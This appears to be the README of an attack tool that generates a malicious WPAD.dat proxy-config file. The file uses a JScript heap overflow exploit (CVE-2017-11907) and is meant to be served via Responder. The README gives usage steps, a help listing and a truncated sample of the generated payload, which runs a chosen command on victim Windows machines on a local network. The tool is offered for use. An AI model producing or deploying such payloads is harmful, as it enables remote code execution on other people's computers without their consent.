CVE-2017-11907 WPAD.dat Generator for Responder

Usage

This script leverages the Project Zero exploit for a heap overflow vulnerability in the JScript library (CVE-2017-11907) to generate a payload for use with Responder.

  1. Generate a payload with main.py.
  2. Copy and paste the output into the WPADScript field of Responder.conf.
test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd
positional arguments:
  cmd                Command (e.g. calc.exe).
optional arguments:
  -h, --help         show this help message and exit
  -o OUT, --out OUT  wpad.dat output path.

test@test:~$ python3 main.py calc.exe
…FindProxyForURL(url,host){var payload=String.fromCharCode(24931…,0);function ale…

References

  1. Project Zero Write-Up (#1383)
  2. Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript
  3. Microsoft Security Bulletin for CVE-2017-11907